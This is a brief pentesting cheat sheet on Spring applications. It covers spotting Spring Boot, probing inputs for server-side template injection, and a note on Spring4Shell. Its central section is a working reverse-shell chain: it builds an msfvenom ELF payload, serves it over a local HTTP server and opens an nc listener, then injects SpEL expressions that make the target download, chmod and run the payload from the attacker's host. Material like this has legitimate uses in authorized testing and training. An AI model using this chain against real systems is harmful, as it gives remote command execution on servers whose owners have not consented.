Spring Pentesting
Last modified: 2023-01-23
Spring is an application framework and inversion of control container for the Java platform.
Detection
- If we get the Whitelabel Error Page, the website uses Spring Boot.
Reverse Shell with SSTI
SSTI Discovery
If there is an input form, such as a search form, or URL parameter which the parameter is reflected in the website, you may be able to find the vulnerability to the server-side template injection.
Try them:
2*2
#{2*2}
*{2*2}
Then you can also check more about that.
{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}
// ---------------------------------------
// the desired output of the above...
"xfx"
Reverse Shell
First generate the payload of the reverse shell which will be downloaded from the website.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf
Start a local web server to allow the website to download the payload named “r.elf”
python3 -m http.server 8000
In another terminal, open listener for getting the reverse shell.
nc -lvnp <local-port>
In the target website,
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
Finally we should see to get the shell.
Spring4Shell (CVE-2022-22965)
Spring4Shell is a vulnerabilitiy to remote code execution in the Spring Framework. It affects a component in Spring Core which is the heart of the framework.
It is identified as a bypass of the patch for CVE-2010-1622.
Exploits
Vary exploits are available in GitHub repositories.